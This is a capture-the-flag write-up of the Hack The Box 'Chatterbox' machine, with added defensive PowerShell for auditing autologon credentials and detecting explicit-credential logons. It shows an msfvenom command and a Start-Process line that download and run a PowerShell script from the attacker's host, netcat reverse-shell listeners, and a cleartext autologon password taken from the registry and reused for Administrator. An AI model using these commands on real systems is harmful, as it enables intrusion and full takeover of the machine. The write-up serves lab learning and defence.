Hack The Box: Chatterbox
15 August, 2021
Starting off with an nmap scan:
Nmap scan report for 10.10.10.74
Host is up, received user-set (0.43s latency).
Scanned at 2021-08-14 12:25:19 EDT for 3058s
Not shown: 65533 filtered ports
Reason: 65533 no-responses
PORT STATE SERVICE REASON VERSION
9255/tcp open http syn-ack ttl 127 AChat chat system httpd
|_http-favicon: Unknown favicon MD5: 0B6115FAE5429FEB9A494BEE6B18ABBE
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open achat syn-ack ttl 127 AChat chat system
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|8.1|7|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows Server 2008 (90%), Microsoft Windows 7 or Windows Server 2008 R2 (90%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.91%E=4%D=8/14%OT=9255%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=6117FA61%P=x86_64-pc-linux-gnu)
SEQ(SP=106%GCD=1%ISR=104%TI=I%TS=7)
SEQ(SP=107%GCD=1%ISR=104%TI=I%II=I%SS=S%TS=7)
OPS(O1=M54BNW8ST11%O2=M54BNW8ST11%O3=M54BNW8NNT11%O4=M54BNW8ST11%O5=M54BNW8ST11%O6=M54BST11)
WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
ECN(R=Y%DF=Y%TG=80%W=2000%O=M54BNW8NNS%CC=N%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)
Uptime guess: 0.038 days (since Sat Aug 14 12:21:58 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
TRACEROUTE (using port 9256/tcp)
HOP RTT ADDRESS
1 344.37 ms 10.10.16.1
2 516.19 ms 10.10.10.74
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 14 13:16:17 2021 -- 1 IP address (1 host up) scanned in 3060.68 seconds
The HTTP server didn't serve anything at the root:
$ curl -v http://10.10.10.74:9255/
* Trying 10.10.10.74:9255...
* Connected to 10.10.10.74 (10.10.10.74) port 9255 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.74:9255
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 204 No Content
< Connection: close
< Server: AChat
<
* Closing connection 0
After looking around, the only exploit I found worth trying was a remote buffer overflow against the AChat service (36025.py below).
User
Instead of the command mentioned in the exploit, I first used shellcode for a windows/shell/reverse_tcp payload, but it didn't work. After a number of other failed payloads, the technique that finally worked was a windows/exec payload that fetches a PowerShell script from my machine and executes it in memory.
$ msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell -c IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.174:8000/mini.ps1')" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
$ python2 36025.py
---->{P00F}!
$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.16.174] from (UNKNOWN) [10.10.10.74] 49162
whoami
chatterbox\alfred
dir C:\
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 7/13/2009 10:37 PM PerfLogs
d-r-- 12/10/2017 1:35 PM Program Files
d-r-- 12/10/2017 9:21 AM Users
d---- 1/4/2021 3:51 AM Windows
-a--- 6/10/2009 5:42 PM 24 autoexec.bat
-a--- 6/10/2009 5:42 PM 10 config.sys
dir C:\Users\
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 12/10/2017 1:34 PM Administrator
d---- 12/10/2017 9:18 AM Alfred
d-r-- 4/11/2011 10:21 PM Public
dir C:\Users\Alfred\Desktop
Directory: C:\Users\Alfred\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar-- 8/15/2021 1:51 AM 34 user.txt
type C:\Users\Alfred\Desktop\user.txt
<flag>
Root
This user held no significant privileges, so the typical Windows token-abuse privilege escalation exploits were not an option.
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
systeminfo also showed a large number of hotfixes installed (183), so the box was well patched.
systeminfo
Host Name: CHATTERBOX
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00371-222-9819843-86663
Original Install Date: 12/10/2017, 9:18:19 AM
System Boot Time: 8/15/2021, 1:51:15 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 2 Processor(s) Installed.
[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,483 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,381 MB
Virtual Memory: In Use: 714 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\CHATTERBOX
Hotfix(s): 183 Hotfix(s) Installed.
...
[182]: KB982018
[183]: KB4054518
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.74
I couldn't find a writable directory, so I didn't try running winPEAS or a similar enumeration script.
I did, however, find autologon credentials stored in cleartext in the Winlogon registry key:
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\winlogon
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
ShutdownWithoutLogon REG_SZ 0
WinStationsDisabled REG_SZ 0
DisableCAD REG_DWORD 0x1
scremoveoption REG_SZ 0
ShutdownFlags REG_DWORD 0x80000033
DefaultDomainName REG_SZ
DefaultUserName REG_SZ Alfred
AutoAdminLogon REG_SZ 1
DefaultPassword REG_SZ Welcome1!
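The finding above is the whole privilege escalation: DefaultPassword is a cleartext REG_SZ under HKLM, readable by any local user, and the same password turned out to be set on the Administrator account. The following audit script is an added example, not part of the original write-up; it reads the same Winlogon key queried above with Get-ItemProperty, reports whether autologon credentials are exposed, and offers a ShouldProcess-aware fix. It assumes a local PowerShell session with rights to read (and, for the fix, write) HKLM; the function and parameter names are my own.

```powershell
# Added audit example, not part of the original write-up. Reads the same
# Winlogon key queried in the write-up and reports whether autologon
# credentials are stored in cleartext; Remove-AutologonPassword undoes it.
# Assumes a local PowerShell session with rights to read (and, for the fix,
# write) HKLM. Function and parameter names are my own.

$WinlogonPath = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Get-AutologonExposure {
    [CmdletBinding()]
    param([string]$Path = $WinlogonPath)

    # Registry values surface as properties; a value that is absent is $null.
    $props = Get-ItemProperty -Path $Path -ErrorAction Stop

    $enabled     = ([string]$props.AutoAdminLogon) -eq '1'
    $hasPassword = -not [string]::IsNullOrEmpty($props.DefaultPassword)

    # A cleartext DefaultPassword is the real finding: any local user can read
    # HKLM and try the value against other accounts. AutoAdminLogon alone
    # (password held elsewhere) is a lesser, physical-access risk.
    $risk = if ($hasPassword) { 'High' } elseif ($enabled) { 'Medium' } else { 'None' }

    [pscustomobject]@{
        AutoAdminLogon  = $props.AutoAdminLogon
        DefaultUserName = $props.DefaultUserName
        DefaultDomain   = $props.DefaultDomainName
        PasswordStored  = $hasPassword
        Risk            = $risk
    }
}

function Remove-AutologonPassword {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([string]$Path = $WinlogonPath)

    # -WhatIf / -Confirm are honoured through ShouldProcess.
    if ($PSCmdlet.ShouldProcess($Path, 'Disable AutoAdminLogon and delete DefaultPassword')) {
        Set-ItemProperty -Path $Path -Name 'AutoAdminLogon' -Value '0' -Type String
        Remove-ItemProperty -Path $Path -Name 'DefaultPassword' -ErrorAction SilentlyContinue
    }
}

# Usage: report first, then preview the fix before applying it without -WhatIf.
Get-AutologonExposure | Format-List
Remove-AutologonPassword -WhatIf
```

On this box the report would show AutoAdminLogon 1, DefaultUserName Alfred and PasswordStored True. Where autologon is genuinely needed (a kiosk, for example), the Sysinternals Autologon tool stores the password as an LSA secret instead of a cleartext REG_SZ, which at least keeps it out of reach of standard users; local administrators can still recover LSA secrets. The second half of the exposure, the same password on Alfred and Administrator, is a password-reuse problem that no registry fix addresses.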
My goal now was to see whether the same credentials would let me log on as Administrator. After looking around I couldn't find a straightforward "sudo su" equivalent for PowerShell, so the only way was to launch another PowerShell reverse shell as Administrator using Start-Process with a PSCredential:
PS C:\Windows\system32> $username = 'Administrator'
PS C:\Windows\system32> $password = 'Welcome1!'
PS C:\Windows\system32> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\Windows\system32> $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
PS C:\Windows\system32> Start-Process powershell.exe -Credential $credential -ArgumentList("IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.174:8000/mini.ps1')")
On my machine:
$ nc -lvnp 4245
listening on [any] 4245 ...
connect to [10.10.16.174] from (UNKNOWN) [10.10.10.74] 49170
whoami
chatterbox\administrator
type C:\Users\Administrator\Desktop\root.txt
<flag>
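Starting a process under another account's explicitly supplied password, as Start-Process -Credential does above, is recorded in the Windows Security log as event 4648 ("A logon was attempted using explicit credentials"), with the calling process and both the subject and target accounts in the event data. The following hunt is an added detection example, not part of the original write-up; the function name and the -OnlyAccountSwitches parameter are my own, and it assumes a session able to read the Security log (local administrator) on a host where Logon auditing is enabled.

```powershell
# Added detection example, not part of the original write-up. Lists recent
# Security 4648 events (logon with explicit credentials), which fire when a
# process such as Start-Process -Credential or runas supplies another
# account's password. Requires rights to read the Security log and Logon
# auditing to be enabled. Function and parameter names are my own.

function Get-ExplicitCredentialLogons {
    [CmdletBinding()]
    param(
        [int]$MaxEvents = 100,
        # Only keep events where the caller and the target account differ:
        # the pattern a low-privileged user switching to Administrator produces.
        [switch]$OnlyAccountSwitches
    )

    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4648 } -MaxEvents $MaxEvents |
        ForEach-Object {
            # Each <Data Name="..."> element of the event XML becomes a field.
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

            [pscustomobject]@{
                Time         = $_.TimeCreated
                Subject      = "$($data.SubjectDomainName)\$($data.SubjectUserName)"
                Target       = "$($data.TargetDomainName)\$($data.TargetUserName)"
                TargetServer = $data.TargetServerName
                Process      = $data.ProcessName
            }
        } |
        Where-Object { -not $OnlyAccountSwitches -or $_.Subject -ne $_.Target }
}

# Usage: show only account switches, the interesting subset for this box.
Get-ExplicitCredentialLogons -OnlyAccountSwitches | Format-Table -AutoSize
```

For the escalation in this write-up the row of interest would show a subject in the Alfred account, a target in the Administrator account and powershell.exe as the process, paired with a 4624 logon for Administrator at the same time. A 4648 whose subject is an unprivileged user and whose target is a local administrator account, originating from a shell rather than a logon UI, is worth an alert on a standalone workstation.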
Overall this was a straightforward machine; however, trying out the various payloads took some time!